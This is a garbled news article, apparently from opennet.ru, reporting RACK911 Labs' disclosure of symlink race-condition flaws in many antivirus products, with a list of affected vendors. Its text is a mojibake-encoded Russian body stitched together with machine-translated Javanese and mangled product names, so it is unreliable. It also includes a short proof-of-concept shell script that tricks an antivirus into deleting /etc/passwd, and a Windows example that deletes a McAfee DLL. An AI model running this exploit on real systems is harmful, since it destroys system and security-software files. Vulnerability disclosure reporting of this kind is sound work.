Umume antivirus rentan kanggo serangan liwat pranala simbolis

Π˜ΡΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΈΠ· ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ RACK911 Labs narik kawigaten Π½Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΠΎΡ‡Ρ‚ΠΈ всС антивирусныС ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ для Windows, Linux ΠΈ macOS Π±Ρ‹Π»ΠΈ уязвимы для Π°Ρ‚Π°ΠΊ, ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€ΡƒΡŽΡ‰ΠΈΡ… состояниСм Π³ΠΎΠ½ΠΊΠΈ (race conditions) Π²ΠΎ врСмя удалСния Ρ„Π°ΠΉΠ»ΠΎΠ², Π² ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΎ врСдоносноС ПО.

Для провСдСния Π°Ρ‚Π°ΠΊΠΈ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒ Ρ„Π°ΠΉΠ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ антивирус распознаСт ΠΊΠ°ΠΊ врСдоносный (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Ρ‚Π΅ΡΡ‚ΠΎΠ²ΡƒΡŽ сигнатуру), Π° Ρ‡Π΅Ρ€Π΅Π· ΠΎΠΏΡ€Π΅Π΄Π΅Π»Ρ‘Π½Π½ΠΎΠ΅ врСмя, послС выявлСния врСдоносного Ρ„Π°ΠΉΠ»Π° антивирусом, Π½ΠΎ нСпосрСдствСнно ΠΏΠ΅Ρ€Π΅Π΄ Π²Ρ‹Π·ΠΎΠ²ΠΎΠΌ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ для Π΅Π³ΠΎ удалСния, ΠΏΠΎΠ΄ΠΌΠ΅Π½ΠΈΡ‚ΡŒ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ с Ρ„Π°ΠΉΠ»ΠΎΠΌ символичСской ссылкой. Π’ Windows для достиТСния Ρ‚ΠΎΠ³ΠΎ ΠΆΠ΅ эффСкта выполняСтся ΠΏΠΎΠ΄ΠΌΠ΅Π½Π° ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π° ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Ρ‚ΠΎΡ‡ΠΊΠΈ соСдинСния (directory junction). ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΠ° Π² Ρ‚ΠΎΠΌ, ΠΏΠΎΡ‡Ρ‚ΠΈ всС антивирусы Π΄ΠΎΠ»ΠΆΠ½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ Π½Π΅ выполняли ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΡƒ символичСских ссылок ΠΈ, считая Ρ‡Ρ‚ΠΎ ΡƒΠ΄Π°Π»ΡΡŽΡ‚ врСдоносный Ρ„Π°ΠΉΠ», удаляли Ρ„Π°ΠΉΠ» Π² ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π΅ Π½Π° ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚ символичСская ссылка.

Π’ Linux ΠΈ macOS ΠΏΠΎΠΊΠ°Π·Π°Π½ΠΎ ΠΊΠ°ΠΊ Ρ‚Π°ΠΊΠΈΠΌ способом Π½Π΅ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ ΠΌΠΎΠΆΠ΅Ρ‚ ΡƒΠ΄Π°Π»ΠΈΡ‚ΡŒ /etc/passwd ΠΈΠ»ΠΈ любой Π΄Ρ€ΡƒΠ³ΠΎΠΉ систСмный Ρ„Π°ΠΉΠ», Π° Π² Windows DDL-Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΡƒ самого антивируса для блокирования Π΅Π³ΠΎ Ρ€Π°Π±ΠΎΡ‚Ρ‹ (Π² Windows Π°Ρ‚Π°ΠΊΠ° ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π° Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΡƒΠ΄Π°Π»Π΅Π½ΠΈΠ΅ΠΌ Ρ„Π°ΠΉΠ»ΠΎΠ², ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π² Ρ‚Π΅ΠΊΡƒΡ‰ΠΈΠΌ ΠΌΠΎΠΌΠ΅Π½Ρ‚ Π½Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ Π΄Ρ€ΡƒΠ³ΠΈΠΌΠΈ прилоТСниями). НапримСр, Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΠΎΠ·Π΄Π°Ρ‚ΡŒ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ Β«exploitΒ» ΠΈ Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒ Π² Π½Π΅Π³ΠΎ Ρ„Π°ΠΉΠ» EpSecApiLib.dll с тСстовой сигнатурой вируса, послС Ρ‡Π΅Π³ΠΎ ΠΏΠ΅Ρ€Π΅Π΄ ΡƒΠ΄Π°Π»Π΅Π½ΠΈΠ΅ΠΌ Π·Π°ΠΌΠ΅Π½ΠΈΡ‚ΡŒ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ Β«exploitΒ» Π½Π° ссылку Β«C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security PlatformΒ», Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²Π΅Π΄Ρ‘Ρ‚ ΠΊ ΡƒΠ΄Π°Π»Π΅Π½ΠΈΡŽ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠΈ EpSecApiLib.dll ΠΈΠ· ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π° антивируса. Π’ Linux ΠΈ macos Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½Ρ‹ΠΉ ΠΏΡ€ΠΈΡ‘ΠΌ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΡ€ΠΎΠ΄Π΅Π»Π°Ρ‚ΡŒ с ΠΏΠΎΠ΄ΠΌΠ΅Π½ΠΎΠΉ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π° Π½Π° ссылку Β«/etcΒ».

#! / bin / sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
while inotifywait -m β€œ/home/user/exploit/passwd” | grep -m 5 β€œOPEN”
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
rampung



Π‘ΠΎΠ»Π΅Π΅ Ρ‚ΠΎΠ³ΠΎ, Π²ΠΎ ΠΌΠ½ΠΎΠ³ΠΈΡ… антивирусах для Linux ΠΈ macOS Π±Ρ‹Π»ΠΎ выявлСно использованиС прСдсказуСмых ΠΈΠΌΡ‘Π½ Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΏΡ€ΠΈ Ρ€Π°Π±ΠΎΡ‚Π΅ с Π²Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΌ Ρ„Π°ΠΉΠ»Π°ΠΌΠΈ Π² ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π΅ /tmp ΠΈ /private/tmp, Ρ‡Ρ‚ΠΎ ΠΌΠΎΠ³Π»ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ для ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π΄ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ root.

К настоящСму Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡ‹ ΡƒΠΆΠ΅ устранСны Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎΠΌ поставщиков, Π½ΠΎ ΠΏΡ€ΠΈΠΌΠ΅Ρ‡Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΠ΅Ρ€Π²Ρ‹Π΅ увСдомлСния ΠΎ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ΅ Π±Ρ‹Π»ΠΈ Π½Π°ΠΏΡ€Π°Π²Π»Π΅Π½Ρ‹ производитСлям Π΅Ρ‰Ρ‘ осСнью 2018 Π³ΠΎΠ΄Π°. НСсмотря Π½Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ Π½Π΅ всС ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ выпустили обновлСния, ΠΈΠΌ Π±Ρ‹Π»ΠΎ Π΄Π°Π½ΠΎ Π½Π° исправлСниС ΠΊΠ°ΠΊ ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ 6 мСсяцСв, ΠΈ RACK911 Labs считаСт, Ρ‡Ρ‚ΠΎ Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ Π²ΠΏΡ€Π°Π²Π΅ Ρ€Π°ΡΠΊΡ€Ρ‹Ρ‚ΡŒ свСдСния ΠΎΠ± уязвимостях. ΠžΡ‚ΠΌΠ΅Ρ‡Π°Π΅Ρ‚ΡΡ, Ρ‡Ρ‚ΠΎ компания RACK911 Labs Π΄Π°Π²Π½ΠΎ занимаСтся Ρ€Π°Π±ΠΎΡ‚ΠΎΠΉ ΠΏΠΎ Π²Ρ‹ΡΠ²Π»Π΅Π½ΠΈΡŽ уязвимостСй, Π½ΠΎ ΠΎΠ½Π° Π½Π΅ ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»Π°Π³Π°Π»Π°, Ρ‡Ρ‚ΠΎ с ΠΊΠΎΠ»Π»Π΅Π³Π°ΠΌΠΈ ΠΈΠ· антивирусной индустрии Π±ΡƒΠ΄Π΅Ρ‚ Ρ‚Π°ΠΊ Ρ‚Ρ€ΡƒΠ΄Π½ΠΎ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ ΠΈΠ·-Π·Π° затягивания выпуска ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠΉ ΠΈ игнорирования нСобходимости срочного устранСния ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ с Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒΡŽ.

ΠŸΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹, ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½Ρ‹Π΅ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ΅ (свободный антивирусный ΠΏΠ°ΠΊΠ΅Ρ‚ ClamAV Π² спискС отсутствуСт):

  • Linux
    • BitDefender GravityZone
    • Keamanan Endpoint Comodo
    • Keamanan Server File Eset
    • Keamanan Linux F-Secure
    • Kaspersy Endpoint Security
    • Keamanan Enda McAfee
    • Sophos Anti-Virus kanggo Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Bebas Anti-Virus
    • BitDefender GravityZone
    • Keamanan Endpoint Comodo
    • Perlindhungan Komputer F-Aman
    • FireEye Endpoint Keamanan
    • Nyegat X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes kanggo Windows
    • Keamanan Enda McAfee
    • Kubah Panda
    • Webroot Aman Ngendi wae
  • MacOS
    • AVG
    • Keamanan Total BitDefender
    • Keamanan Cyber ​​Eset
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Aman Ngendi wae

    Source: opennet.ru

Add a comment